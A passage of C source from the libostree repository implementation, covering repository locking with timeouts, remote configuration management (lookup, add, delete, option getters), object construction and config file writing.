up to lock-timeout-secs seconds * attempting to acquire the lock. If the lock cannot be acquired within the * timeout, a %G_IO_ERROR_WOULD_BLOCK error is returned. * * If @self is not writable by the user, then no locking is attempted and * %TRUE is returned. * * Returns: %TRUE on success, otherwise %FALSE with @error set */ gboolean _ostree_repo_lock_push (OstreeRepo *self, OstreeRepoLockType lock_type, GCancellable *cancellable, GError **error) { g_return_val_if_fail (self != NULL, FALSE); g_return_val_if_fail (OSTREE_IS_REPO (self), FALSE); g_return_val_if_fail (self->inited, FALSE); g_return_val_if_fail (cancellable == NULL || G_IS_CANCELLABLE (cancellable), FALSE); g_return_val_if_fail (error == NULL || *error == NULL, FALSE); if (!self->writable) return TRUE; g_assert (self->lock_timeout_seconds >= REPO_LOCK_DISABLED); if (self->lock_timeout_seconds == REPO_LOCK_DISABLED) return TRUE; /* No locking */ else if (self->lock_timeout_seconds == REPO_LOCK_BLOCKING) { g_debug ("Pushing lock blocking"); return push_repo_lock (self, lock_type, TRUE, error); } else { /* Convert to unsigned to guard against negative values */ guint lock_timeout_seconds = self->lock_timeout_seconds; guint waited = 0; g_debug ("Pushing lock non-blocking with timeout %u", lock_timeout_seconds); for (;;) { if (g_cancellable_set_error_if_cancelled (cancellable, error)) return FALSE; g_autoptr(GError) local_error = NULL; if (push_repo_lock (self, lock_type, FALSE, &local_error)) return TRUE; if (!g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_WOULD_BLOCK)) { g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } if (waited >= lock_timeout_seconds) { g_debug ("Push lock: Could not acquire lock within %u seconds", lock_timeout_seconds); g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } /* Sleep 1 second and try again */ if (waited % 60 == 0) { guint remaining = lock_timeout_seconds - waited; g_debug ("Push lock: Waiting %u more second%s to acquire lock", remaining, (remaining == 1) ? "" : "s"); } waited++; sleep (1); } } } /* * _ostree_repo_lock_pop: * @self: a #OstreeRepo * @cancellable: a #GCancellable * @error: a #GError * * Remove the current repository lock state from the lock stack. If the lock * stack becomes empty, the repository is unlocked. Otherwise, the lock state * only changes when transitioning from an exclusive lock back to a shared * lock. * * ostree_repo_lock_pop() waits for the lock depending on the repository's * lock-timeout-secs configuration. When lock-timeout-secs is -1, a blocking lock is * attempted. Otherwise, the lock is removed non-blocking and * ostree_repo_lock_pop() will sleep synchronously up to lock-timeout-secs seconds * attempting to remove the lock. If the lock cannot be removed within the * timeout, a %G_IO_ERROR_WOULD_BLOCK error is returned. * * If @self is not writable by the user, then no unlocking is attempted and * %TRUE is returned. * * Returns: %TRUE on success, otherwise %FALSE with @error set */ gboolean _ostree_repo_lock_pop (OstreeRepo *self, GCancellable *cancellable, GError **error) { g_return_val_if_fail (self != NULL, FALSE); g_return_val_if_fail (OSTREE_IS_REPO (self), FALSE); g_return_val_if_fail (self->inited, FALSE); g_return_val_if_fail (cancellable == NULL || G_IS_CANCELLABLE (cancellable), FALSE); g_return_val_if_fail (error == NULL || *error == NULL, FALSE); if (!self->writable) return TRUE; g_assert (self->lock_timeout_seconds >= REPO_LOCK_DISABLED); if (self->lock_timeout_seconds == REPO_LOCK_DISABLED) return TRUE; else if (self->lock_timeout_seconds == REPO_LOCK_BLOCKING) { g_debug ("Popping lock blocking"); return pop_repo_lock (self, TRUE, error); } else { /* Convert to unsigned to guard against negative values */ guint lock_timeout_seconds = self->lock_timeout_seconds; guint waited = 0; g_debug ("Popping lock non-blocking with timeout %u", lock_timeout_seconds); for (;;) { if (g_cancellable_set_error_if_cancelled (cancellable, error)) return FALSE; g_autoptr(GError) local_error = NULL; if (pop_repo_lock (self, FALSE, &local_error)) return TRUE; if (!g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_WOULD_BLOCK)) { g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } if (waited >= lock_timeout_seconds) { g_debug ("Pop lock: Could not remove lock within %u seconds", lock_timeout_seconds); g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } /* Sleep 1 second and try again */ if (waited % 60 == 0) { guint remaining = lock_timeout_seconds - waited; g_debug ("Pop lock: Waiting %u more second%s to remove lock", remaining, (remaining == 1) ? "" : "s"); } waited++; sleep (1); } } } /* * _ostree_repo_auto_lock_push: (skip) * @self: a #OstreeRepo * @lock_type: the type of lock to acquire * @cancellable: a #GCancellable * @error: a #GError * * Like ostree_repo_lock_push(), but for usage with #OstreeRepoAutoLock. * The intended usage is to declare the #OstreeRepoAutoLock with * g_autoptr() so that ostree_repo_auto_lock_cleanup() is called when it * goes out of scope. This will automatically pop the lock status off * the stack if it was acquired successfully. * * |[<!-- language="C" --> * g_autoptr(OstreeRepoAutoLock) lock = NULL; * lock = _ostree_repo_auto_lock_push (repo, lock_type, cancellable, error); * if (!lock) * return FALSE; * ]| * * Returns: @self on success, otherwise %NULL with @error set */ OstreeRepoAutoLock * _ostree_repo_auto_lock_push (OstreeRepo *self, OstreeRepoLockType lock_type, GCancellable *cancellable, GError **error) { if (!_ostree_repo_lock_push (self, lock_type, cancellable, error)) return NULL; return (OstreeRepoAutoLock *)self; } /* * _ostree_repo_auto_lock_cleanup: (skip) * @lock: a #OstreeRepoAutoLock * * A cleanup handler for use with ostree_repo_auto_lock_push(). If @lock is * not %NULL, ostree_repo_lock_pop() will be called on it. If * ostree_repo_lock_pop() fails, a critical warning will be emitted. */ void _ostree_repo_auto_lock_cleanup (OstreeRepoAutoLock *lock) { OstreeRepo *repo = lock; if (repo) { g_autoptr(GError) error = NULL; int errsv = errno; if (!_ostree_repo_lock_pop (repo, NULL, &error)) g_critical ("Cleanup repo lock failed: %s", error->message); errno = errsv; } } static GFile * get_remotes_d_dir (OstreeRepo *self, GFile *sysroot); OstreeRemote * _ostree_repo_get_remote (OstreeRepo *self, const char *name, GError **error) { OstreeRemote *remote = NULL; g_return_val_if_fail (name != NULL, NULL); g_mutex_lock (&self->remotes_lock); remote = g_hash_table_lookup (self->remotes, name); if (remote != NULL) ostree_remote_ref (remote); else g_set_error (error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND, "Remote \"%s\" not found", name); g_mutex_unlock (&self->remotes_lock); return remote; } OstreeRemote * _ostree_repo_get_remote_inherited (OstreeRepo *self, const char *name, GError **error) { g_autoptr(OstreeRemote) remote = NULL; g_autoptr(GError) temp_error = NULL; remote = _ostree_repo_get_remote (self, name, &temp_error); if (remote == NULL) { if (self->parent_repo != NULL) return _ostree_repo_get_remote_inherited (self->parent_repo, name, error); g_propagate_error (error, g_steal_pointer (&temp_error)); return NULL; } return g_steal_pointer (&remote); } gboolean _ostree_repo_add_remote (OstreeRepo *self, OstreeRemote *remote) { gboolean already_existed; g_return_val_if_fail (self != NULL, FALSE); g_return_val_if_fail (remote != NULL, FALSE); g_return_val_if_fail (remote->name != NULL, FALSE); g_mutex_lock (&self->remotes_lock); already_existed = !g_hash_table_replace (self->remotes, remote->name, ostree_remote_ref (remote)); g_mutex_unlock (&self->remotes_lock); return already_existed; } gboolean _ostree_repo_remove_remote (OstreeRepo *self, OstreeRemote *remote) { gboolean removed; g_return_val_if_fail (self != NULL, FALSE); g_return_val_if_fail (remote != NULL, FALSE); g_return_val_if_fail (remote->name != NULL, FALSE); g_mutex_lock (&self->remotes_lock); removed = g_hash_table_remove (self->remotes, remote->name); g_mutex_unlock (&self->remotes_lock); return removed; } gboolean _ostree_repo_remote_name_is_file (const char *remote_name) { return g_str_has_prefix (remote_name, "file://"); } /** * ostree_repo_get_remote_option: * @self: A OstreeRepo * @remote_name: Name * @option_name: Option * @default_value: (allow-none): Value returned if @option_name is not present * @out_value: (out): Return location for value * @error: Error * * OSTree remotes are represented by keyfile groups, formatted like: * `[remote "remotename"]`. This function returns a value named @option_name * underneath that group, or @default_value if the remote exists but not the * option name. If an error is returned, @out_value will be set to %NULL. * * Returns: %TRUE on success, otherwise %FALSE with @error set * * Since: 2016.5 */ gboolean ostree_repo_get_remote_option (OstreeRepo *self, const char *remote_name, const char *option_name, const char *default_value, char **out_value, GError **error) { g_autoptr(OstreeRemote) remote = NULL; gboolean ret = FALSE; g_autoptr(GError) temp_error = NULL; g_autofree char *value = NULL; if (_ostree_repo_remote_name_is_file (remote_name)) { *out_value = g_strdup (default_value); return TRUE; } remote = _ostree_repo_get_remote (self, remote_name, &temp_error); if (remote != NULL) { value = g_key_file_get_string (remote->options, remote->group, option_name, &temp_error); if (value == NULL) { if (g_error_matches (temp_error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_KEY_NOT_FOUND)) { /* Note: We ignore errors on the parent because the parent config may not specify this remote, causing a "remote not found" error, but we found the remote at some point, so we need to instead return the default */ if (self->parent_repo != NULL && ostree_repo_get_remote_option (self->parent_repo, remote_name, option_name, default_value, out_value, NULL)) return TRUE; value = g_strdup (default_value); ret = TRUE; } else g_propagate_error (error, g_steal_pointer (&temp_error)); } else ret = TRUE; } else if (self->parent_repo != NULL) return ostree_repo_get_remote_option (self->parent_repo, remote_name, option_name, default_value, out_value, error); else g_propagate_error (error, g_steal_pointer (&temp_error)); *out_value = g_steal_pointer (&value); return ret; } /** * ostree_repo_get_remote_list_option: * @self: A OstreeRepo * @remote_name: Name * @option_name: Option * @out_value: (out) (array zero-terminated=1): location to store the list * of strings. The list should be freed with * g_strfreev(). * @error: Error * * OSTree remotes are represented by keyfile groups, formatted like: * `[remote "remotename"]`. This function returns a value named @option_name * underneath that group, and returns it as a zero terminated array of strings. * If the option is not set, or if an error is returned, @out_value will be set * to %NULL. * * Returns: %TRUE on success, otherwise %FALSE with @error set * * Since: 2016.5 */ gboolean ostree_repo_get_remote_list_option (OstreeRepo *self, const char *remote_name, const char *option_name, char ***out_value, GError **error) { g_autoptr(OstreeRemote) remote = NULL; gboolean ret = FALSE; g_autoptr(GError) temp_error = NULL; g_auto(GStrv) value = NULL; if (_ostree_repo_remote_name_is_file (remote_name)) { *out_value = NULL; return TRUE; } remote = _ostree_repo_get_remote (self, remote_name, &temp_error); if (remote != NULL) { value = g_key_file_get_string_list (remote->options, remote->group, option_name, NULL, &temp_error); /* Default value if key not found is always NULL. */ if (g_error_matches (temp_error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_KEY_NOT_FOUND)) { /* Note: We ignore errors on the parent because the parent config may not specify this remote, causing a "remote not found" error, but we found the remote at some point, so we need to instead return the default */ if (self->parent_repo != NULL && ostree_repo_get_remote_list_option (self->parent_repo, remote_name, option_name, out_value, NULL)) return TRUE; ret = TRUE; } else if (temp_error) g_propagate_error (error, g_steal_pointer (&temp_error)); else ret = TRUE; } else if (self->parent_repo != NULL) return ostree_repo_get_remote_list_option (self->parent_repo, remote_name, option_name, out_value, error); else g_propagate_error (error, g_steal_pointer (&temp_error)); *out_value = g_steal_pointer (&value); return ret; } /** * ostree_repo_get_remote_boolean_option: * @self: A OstreeRepo * @remote_name: Name * @option_name: Option * @default_value: Value returned if @option_name is not present * @out_value: (out) : location to store the result. * @error: Error * * OSTree remotes are represented by keyfile groups, formatted like: * `[remote "remotename"]`. This function returns a value named @option_name * underneath that group, and returns it as a boolean. * If the option is not set, @out_value will be set to @default_value. If an * error is returned, @out_value will be set to %FALSE. * * Returns: %TRUE on success, otherwise %FALSE with @error set * * Since: 2016.5 */ gboolean ostree_repo_get_remote_boolean_option (OstreeRepo *self, const char *remote_name, const char *option_name, gboolean default_value, gboolean *out_value, GError **error) { g_autoptr(OstreeRemote) remote = NULL; g_autoptr(GError) temp_error = NULL; gboolean ret = FALSE; gboolean value = FALSE; if (_ostree_repo_remote_name_is_file (remote_name)) { *out_value = default_value; return TRUE; } remote = _ostree_repo_get_remote (self, remote_name, &temp_error); if (remote != NULL) { value = g_key_file_get_boolean (remote->options, remote->group, option_name, &temp_error); if (temp_error != NULL) { if (g_error_matches (temp_error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_KEY_NOT_FOUND)) { /* Note: We ignore errors on the parent because the parent config may not specify this remote, causing a "remote not found" error, but we found the remote at some point, so we need to instead return the default */ if (self->parent_repo != NULL && ostree_repo_get_remote_boolean_option (self->parent_repo, remote_name, option_name, default_value, out_value, NULL)) return TRUE; value = default_value; ret = TRUE; } else g_propagate_error (error, g_steal_pointer (&temp_error)); } else ret = TRUE; } else if (self->parent_repo != NULL) return ostree_repo_get_remote_boolean_option (self->parent_repo, remote_name, option_name, default_value, out_value, error); else g_propagate_error (error, g_steal_pointer (&temp_error)); *out_value = value; return ret; } static void ostree_repo_finalize (GObject *object) { OstreeRepo *self = OSTREE_REPO (object); g_clear_object (&self->parent_repo); g_free (self->stagedir_prefix); g_clear_object (&self->repodir_fdrel); g_clear_object (&self->repodir); glnx_close_fd (&self->repo_dir_fd); glnx_tmpdir_unset (&self->commit_stagedir); glnx_release_lock_file (&self->commit_stagedir_lock); glnx_close_fd (&self->tmp_dir_fd); glnx_close_fd (&self->cache_dir_fd); glnx_close_fd (&self->objects_dir_fd); glnx_close_fd (&self->uncompressed_objects_dir_fd); g_clear_object (&self->sysroot_dir); g_weak_ref_clear (&self->sysroot); g_free (self->remotes_config_dir); if (self->loose_object_devino_hash) g_hash_table_destroy (self->loose_object_devino_hash); if (self->updated_uncompressed_dirs) g_hash_table_destroy (self->updated_uncompressed_dirs); if (self->config) g_key_file_free (self->config); g_clear_pointer (&self->txn.refs, g_hash_table_destroy); g_clear_pointer (&self->txn.collection_refs, g_hash_table_destroy); g_clear_error (&self->writable_error); g_clear_pointer (&self->object_sizes, (GDestroyNotify) g_hash_table_unref); g_clear_pointer (&self->dirmeta_cache, (GDestroyNotify) g_hash_table_unref); g_mutex_clear (&self->cache_lock); g_mutex_clear (&self->txn_lock); g_free (self->collection_id); g_strfreev (self->repo_finders); g_clear_pointer (&self->remotes, g_hash_table_destroy); g_mutex_clear (&self->remotes_lock); GHashTable *lock_table = g_private_get (&repo_lock_table); if (lock_table) { g_hash_table_remove (lock_table, self); if (g_hash_table_size (lock_table) == 0) g_private_replace (&repo_lock_table, NULL); } G_OBJECT_CLASS (ostree_repo_parent_class)->finalize (object); } static void ostree_repo_set_property(GObject *object, guint prop_id, const GValue *value, GParamSpec *pspec) { OstreeRepo *self = OSTREE_REPO (object); switch (prop_id) { case PROP_PATH: self->repodir = g_value_dup_object (value); break; case PROP_SYSROOT_PATH: self->sysroot_dir = g_value_dup_object (value); break; case PROP_REMOTES_CONFIG_DIR: self->remotes_config_dir = g_value_dup_string (value); break; default: G_OBJECT_WARN_INVALID_PROPERTY_ID (object, prop_id, pspec); break; } } static void ostree_repo_get_property(GObject *object, guint prop_id, GValue *value, GParamSpec *pspec) { OstreeRepo *self = OSTREE_REPO (object); switch (prop_id) { case PROP_PATH: g_value_set_object (value, self->repodir); break; case PROP_SYSROOT_PATH: g_value_set_object (value, self->sysroot_dir); break; case PROP_REMOTES_CONFIG_DIR: g_value_set_string (value, self->remotes_config_dir); break; default: G_OBJECT_WARN_INVALID_PROPERTY_ID (object, prop_id, pspec); break; } } static void ostree_repo_class_init (OstreeRepoClass *klass) { GObjectClass *object_class = G_OBJECT_CLASS (klass); object_class->get_property = ostree_repo_get_property; object_class->set_property = ostree_repo_set_property; object_class->finalize = ostree_repo_finalize; /** * OstreeRepo:path: * * Path to repository. Note that if this repository was created * via `ostree_repo_new_at()`, this value will refer to a value in * the Linux kernel's `/proc/self/fd` directory. Generally, you * should avoid using this property at all; you can gain a reference * to the repository's directory fd via `ostree_repo_get_dfd()` and * use file-descriptor relative operations. */ g_object_class_install_property (object_class, PROP_PATH, g_param_spec_object ("path", "Path", "Path", G_TYPE_FILE, G_PARAM_READWRITE | G_PARAM_CONSTRUCT_ONLY)); /** * OstreeRepo:sysroot-path: * * A system using libostree for the host has a "system" repository; this * property will be set for repositories referenced via * `ostree_sysroot_repo()` for example. * * You should avoid using this property; if your code is operating * on a system repository, use `OstreeSysroot` and access the repository * object via `ostree_sysroot_repo()`. */ g_object_class_install_property (object_class, PROP_SYSROOT_PATH, g_param_spec_object ("sysroot-path", "", "", G_TYPE_FILE, G_PARAM_READWRITE | G_PARAM_CONSTRUCT_ONLY)); /** * OstreeRepo:remotes-config-dir: * * Path to directory containing remote definitions. The default is `NULL`. * If a `sysroot-path` property is defined, this value will default to * `${sysroot_path}/etc/ostree/remotes.d`. * * This value will only be used for system repositories. */ g_object_class_install_property (object_class, PROP_REMOTES_CONFIG_DIR, g_param_spec_string ("remotes-config-dir", "", "", NULL, G_PARAM_READWRITE | G_PARAM_CONSTRUCT_ONLY)); #ifndef OSTREE_DISABLE_GPGME /** * OstreeRepo::gpg-verify-result: * @self: an #OstreeRepo * @checksum: checksum of the signed object * @result: an #OstreeGpgVerifyResult * * Emitted during a pull operation upon GPG verification (if enabled). * Applications can connect to this signal to output the verification * results if desired. * * The signal will be emitted from whichever #GMainContext is the * thread-default at the point when ostree_repo_pull_with_options() * is called. */ signals[GPG_VERIFY_RESULT] = g_signal_new ("gpg-verify-result", OSTREE_TYPE_REPO, G_SIGNAL_RUN_LAST, G_STRUCT_OFFSET (OstreeRepoClass, gpg_verify_result), NULL, NULL, NULL, G_TYPE_NONE, 2, G_TYPE_STRING, OSTREE_TYPE_GPG_VERIFY_RESULT); #endif /* OSTREE_DISABLE_GPGME */ } static void ostree_repo_init (OstreeRepo *self) { const GDebugKey test_error_keys[] = { { "pre-commit", OSTREE_REPO_TEST_ERROR_PRE_COMMIT }, { "invalid-cache", OSTREE_REPO_TEST_ERROR_INVALID_CACHE }, }; #ifndef OSTREE_DISABLE_GPGME static gsize gpgme_initialized; if (g_once_init_enter (&gpgme_initialized)) { gpgme_check_version (NULL); gpgme_set_locale (NULL, LC_CTYPE, setlocale (LC_CTYPE, NULL)); g_once_init_leave (&gpgme_initialized, 1); } #endif self->test_error_flags = g_parse_debug_string (g_getenv ("OSTREE_REPO_TEST_ERROR"), test_error_keys, G_N_ELEMENTS (test_error_keys)); g_mutex_init (&self->cache_lock); g_mutex_init (&self->txn_lock); self->remotes = g_hash_table_new_full (g_str_hash, g_str_equal, (GDestroyNotify) NULL, (GDestroyNotify) ostree_remote_unref); g_mutex_init (&self->remotes_lock); self->repo_dir_fd = -1; self->cache_dir_fd = -1; self->tmp_dir_fd = -1; self->objects_dir_fd = -1; self->uncompressed_objects_dir_fd = -1; self->sysroot_kind = OSTREE_REPO_SYSROOT_KIND_UNKNOWN; } /** * ostree_repo_new: * @path: Path to a repository * * Returns: (transfer full): An accessor object for an OSTree repository located at @path */ OstreeRepo* ostree_repo_new (GFile *path) { return g_object_new (OSTREE_TYPE_REPO, "path", path, NULL); } static OstreeRepo * repo_open_at_take_fd (int *dfd, GCancellable *cancellable, GError **error) { g_autoptr(OstreeRepo) repo = g_object_new (OSTREE_TYPE_REPO, NULL); repo->repo_dir_fd = glnx_steal_fd (dfd); if (!ostree_repo_open (repo, cancellable, error)) return NULL; return g_steal_pointer (&repo); } /** * ostree_repo_open_at: * @dfd: Directory fd * @path: Path * * This combines ostree_repo_new() (but using fd-relative access) with * ostree_repo_open(). Use this when you know you should be operating on an * already extant repository. If you want to create one, use ostree_repo_create_at(). * * Returns: (transfer full): An accessor object for an OSTree repository located at @dfd + @path * * Since: 2017.10 */ OstreeRepo* ostree_repo_open_at (int dfd, const char *path, GCancellable *cancellable, GError **error) { glnx_autofd int repo_dfd = -1; if (!glnx_opendirat (dfd, path, TRUE, &repo_dfd, error)) return NULL; return repo_open_at_take_fd (&repo_dfd, cancellable, error); } static GFile * get_default_repo_path (GFile *sysroot_path) { if (sysroot_path == NULL) sysroot_path = _ostree_get_default_sysroot_path (); return g_file_resolve_relative_path (sysroot_path, "ostree/repo"); } /** * ostree_repo_new_for_sysroot_path: * @repo_path: Path to a repository * @sysroot_path: Path to the system root * * Creates a new #OstreeRepo instance, taking the system root path explicitly * instead of assuming "/". * * Returns: (transfer full): An accessor object for the OSTree repository located at @repo_path. */ OstreeRepo * ostree_repo_new_for_sysroot_path (GFile *repo_path, GFile *sysroot_path) { return g_object_new (OSTREE_TYPE_REPO, "path", repo_path, "sysroot-path", sysroot_path, NULL); } /** * ostree_repo_new_default: * * If the current working directory appears to be an OSTree * repository, create a new #OstreeRepo object for accessing it. * Otherwise use the path in the OSTREE_REPO environment variable * (if defined) or else the default system repository located at * /ostree/repo. * * Returns: (transfer full): An accessor object for an OSTree repository located at /ostree/repo */ OstreeRepo* ostree_repo_new_default (void) { if (g_file_test ("objects", G_FILE_TEST_IS_DIR) && g_file_test ("config", G_FILE_TEST_IS_REGULAR)) { g_autoptr(GFile) cwd = g_file_new_for_path ("."); return ostree_repo_new (cwd); } else { const char *envvar = g_getenv ("OSTREE_REPO"); g_autoptr(GFile) repo_path = NULL; if (envvar == NULL || *envvar == '\0') repo_path = get_default_repo_path (NULL); else repo_path = g_file_new_for_path (envvar); return ostree_repo_new (repo_path); } } /** * ostree_repo_is_system: * @repo: Repository * * Returns: %TRUE if this repository is the root-owned system global repository */ gboolean ostree_repo_is_system (OstreeRepo *repo) { g_return_val_if_fail (OSTREE_IS_REPO (repo), FALSE); /* If we were created via ostree_sysroot_get_repo(), we know the answer is yes * without having to compare file paths. */ if (repo->sysroot_kind == OSTREE_REPO_SYSROOT_KIND_VIA_SYSROOT || repo->sysroot_kind == OSTREE_REPO_SYSROOT_KIND_IS_SYSROOT_OSTREE) return TRUE; /* No sysroot_dir set? Not a system repo then. */ if (!repo->sysroot_dir) return FALSE; /* If we created via ostree_repo_new(), we'll have a repo path. Compare * it to the sysroot path in that case. */ if (repo->repodir) { g_autoptr(GFile) default_repo_path = get_default_repo_path (repo->sysroot_dir); return g_file_equal (repo->repodir, default_repo_path); } /* Otherwise, not a system repo */ return FALSE; } /** * ostree_repo_is_writable: * @self: Repo * @error: a #GError * * Returns whether the repository is writable by the current user. * If the repository is not writable, the @error indicates why. * * Returns: %TRUE if this repository is writable */ gboolean ostree_repo_is_writable (OstreeRepo *self, GError **error) { g_return_val_if_fail (self->inited, FALSE); if (error != NULL && self->writable_error != NULL) *error = g_error_copy (self->writable_error); return self->writable; } /** * _ostree_repo_update_mtime: * @self: Repo * @error: a #GError * * Bump the mtime of the repository so that programs * can detect that the refs have updated. */ gboolean _ostree_repo_update_mtime (OstreeRepo *self, GError **error) { if (futimens (self->repo_dir_fd, NULL) != 0) { glnx_set_prefix_error_from_errno (error, "%s", "futimens"); return FALSE; } return TRUE; } /** * ostree_repo_get_config: * @self: * * Returns: (transfer none): The repository configuration; do not modify */ GKeyFile * ostree_repo_get_config (OstreeRepo *self) { g_return_val_if_fail (self->inited, NULL); return self->config; } /** * ostree_repo_copy_config: * @self: * * Returns: (transfer full): A newly-allocated copy of the repository config */ GKeyFile * ostree_repo_copy_config (OstreeRepo *self) { GKeyFile *copy; char *data; gsize len; g_return_val_if_fail (self->inited, NULL); copy = g_key_file_new (); data = g_key_file_to_data (self->config, &len, NULL); if (!g_key_file_load_from_data (copy, data, len, 0, NULL)) g_assert_not_reached (); g_free (data); return copy; } /** * ostree_repo_write_config: * @self: Repo * @new_config: Overwrite the config file with this data * @error: a #GError * * Save @new_config in place of this repository's config file. */ gboolean ostree_repo_write_config (OstreeRepo *self, GKeyFile *new_config, GError **error) { g_return_val_if_fail (self->inited, FALSE); /* Ensure that any remotes in the new config aren't defined in a * separate config file. */ gsize num_groups; g_auto(GStrv) groups = g_key_file_get_groups (new_config, &num_groups); for (gsize i = 0; i < num_groups; i++) { g_autoptr(OstreeRemote) new_remote = ostree_remote_new_from_keyfile (new_config, groups[i]); if (new_remote != NULL) { g_autoptr(GError) local_error = NULL; g_autoptr(OstreeRemote) cur_remote = _ostree_repo_get_remote (self, new_remote->name, &local_error); if (cur_remote == NULL) { if (!g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND)) { g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } } else if (cur_remote->file != NULL) { g_set_error (error, G_IO_ERROR, G_IO_ERROR_EXISTS, "Remote \"%s\" already defined in %s", new_remote->name, gs_file_get_path_cached (cur_remote->file)); return FALSE; } } } gsize len; g_autofree char *data = g_key_file_to_data (new_config, &len, error); if (!glnx_file_replace_contents_at (self->repo_dir_fd, "config", (guint8*)data, len, 0, NULL, error)) return FALSE; g_key_file_free (self->config); self->config = g_key_file_new (); if (!g_key_file_load_from_data (self->config, data, len, 0, error)) return FALSE; return TRUE; } /* Bind a subset of an a{sv} to options in a given GKeyfile section */ static void keyfile_set_from_vardict (GKeyFile *keyfile, const char *section, GVariant *vardict) { GVariantIter viter; const char *key; GVariant *val; g_variant_iter_init (&viter, vardict); while (g_variant_iter_loop (&viter, "{&s@v}", &key, &val)) { g_autoptr(GVariant) child = g_variant_get_variant (val); if (g_variant_is_of_type (child, G_VARIANT_TYPE_STRING)) g_key_file_set_string (keyfile, section, key, g_variant_get_string (child, NULL)); else if (g_variant_is_of_type (child, G_VARIANT_TYPE_BOOLEAN)) g_key_file_set_boolean (keyfile, section, key, g_variant_get_boolean (child)); else if (g_variant_is_of_type (child, G_VARIANT_TYPE_STRING_ARRAY)) { gsize len; g_autofree const gchar **strv_child = g_variant_get_strv (child, &len); g_key_file_set_string_list (keyfile, section, key, strv_child, len); } else g_critical ("Unhandled type '%s' in %s", (char*)g_variant_get_type (child), G_STRFUNC); } } static gboolean impl_repo_remote_add (OstreeRepo *self, GFile *sysroot, gboolean if_not_exists, const char *name, const char *url, GVariant *options, GCancellable *cancellable, GError **error) { g_return_val_if_fail (name != NULL, FALSE); g_return_val_if_fail (url != NULL, FALSE); g_return_val_if_fail (options == NULL || g_variant_is_of_type (options, G_VARIANT_TYPE ("a{sv}")), FALSE); if (!ostree_validate_remote_name (name, error)) return FALSE; g_autoptr(OstreeRemote) remote = _ostree_repo_get_remote (self, name, NULL); if (remote != NULL && if_not_exists) { /* Note early return */ return TRUE; } else if (remote != NULL) { return glnx_throw (error, "Remote configuration for \"%s\" already exists: %s", name, remote->file ? gs_file_get_path_cached (remote->file) : "(in config)"); } remote = ostree_remote_new (name); /* Only add repos in remotes.d if the repo option * add-remotes-config-dir is true. This is the default for system * repos. */ g_autoptr(GFile) etc_ostree_remotes_d = get_remotes_d_dir (self, sysroot); if (etc_ostree_remotes_d && self->add_remotes_config_dir) { g_autoptr(GError) local_error = NULL; if (!g_file_make_directory_with_parents (etc_ostree_remotes_d, cancellable, &local_error)) { if (g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_EXISTS)) { g_clear_error (&local_error); } else { g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } } g_autofree char *basename = g_strconcat (name, ".conf", NULL); remote->file = g_file_get_child (etc_ostree_remotes_d, basename); } if (g_str_has_prefix (url, "metalink=")) g_key_file_set_string (remote->options, remote->group, "metalink", url + strlen ("metalink=")); else g_key_file_set_string (remote->options, remote->group, "url", url); if (options) keyfile_set_from_vardict (remote->options, remote->group, options); if (remote->file != NULL) { gsize length; g_autofree char *data = g_key_file_to_data (remote->options, &length, NULL); if (!g_file_replace_contents (remote->file, data, length, NULL, FALSE, 0, NULL, cancellable, error)) return FALSE; } else { g_autoptr(GKeyFile) config = NULL; config = ostree_repo_copy_config (self); ot_keyfile_copy_group (remote->options, config, remote->group); if (!ostree_repo_write_config (self, config, error)) return FALSE; } _ostree_repo_add_remote (self, remote); return TRUE; } /** * ostree_repo_remote_add: * @self: Repo * @name: Name of remote * @url: URL for remote (if URL begins with metalink=, it will be used as such) * @options: (allow-none): GVariant of type a{sv} * @cancellable: Cancellable * @error: Error * * Create a new remote named @name pointing to @url. If @options is * provided, then it will be mapped to #GKeyFile entries, where the * GVariant dictionary key is an option string, and the value is * mapped as follows: * * s: g_key_file_set_string() * * b: g_key_file_set_boolean() * * as: g_key_file_set_string_list() * */ gboolean ostree_repo_remote_add (OstreeRepo *self, const char *name, const char *url, GVariant *options, GCancellable *cancellable, GError **error) { return impl_repo_remote_add (self, NULL, FALSE, name, url, options, cancellable, error); } static gboolean impl_repo_remote_delete (OstreeRepo *self, GFile *sysroot, gboolean if_exists, const char *name, GCancellable *cancellable, GError **error) { g_return_val_if_fail (name != NULL, FALSE); if (!ostree_validate_remote_name (name, error)) return FALSE; g_autoptr(OstreeRemote) remote = NULL; if (if_exists) { remote = _ostree_repo_get_remote (self, name, NULL); if (!remote) { /* Note early return */ return TRUE; } } else remote = _ostree_repo_get_remote (self, name, error); if (remote == NULL) return FALSE; if (remote->file != NULL) { if (!glnx_unlinkat (AT_FDCWD, gs_file_get_path_cached (remote->file), 0, error)) return FALSE; } else { g_autoptr(GKeyFile) config = ostree_repo_copy_config (self); /* XXX Not sure it's worth failing if the group to remove * isn't found. It's the end result we want, after all. */ if (g_key_file_remove_group (config, remote->group, NULL)) { if (!ostree_repo_write_config (self, config, error)) return FALSE; } } /* Delete the remote's keyring file, if it exists. */ if (!ot_ensure_unlinked_at (self->repo_dir_fd, remote->keyring, error)) return FALSE; _ostree_repo_remove_remote (self, remote); return TRUE; } /** * ostree_repo_remote_delete: * @self: Repo * @name: Name of remote * @cancellable: Cancellable * @error: Error * * Delete the remote named @name. It is an error if the provided * remote does not exist. * */ gboolean ostree_repo_remote_delete (OstreeRepo *self, const char *name, GCancellable *cancellable, GError **error) { return impl_repo_remote_delete (self, NULL, FALSE, name, cancellable, error); } static gboolean impl_repo_remote_replace (OstreeRepo *self, GFile *sysroot, const char *name, const char *url, GVariant *options, GCancellable *cancellable, GError **error) { g_return_val_if_fail (name != NULL, FALSE); g_return_val_if_fail (url != NULL, FALSE); g_return_val_if_fail (options == NULL || g_variant_is_of_type (options, G_VARIANT_TYPE ("a{sv}")), FALSE); if (!ostree_validate_remote_name (name, error)) return FALSE; g_autoptr(GError) local_error = NULL; g_autoptr(OstreeRemote) remote = _ostree_repo_get_remote (self, name, &local_error); if 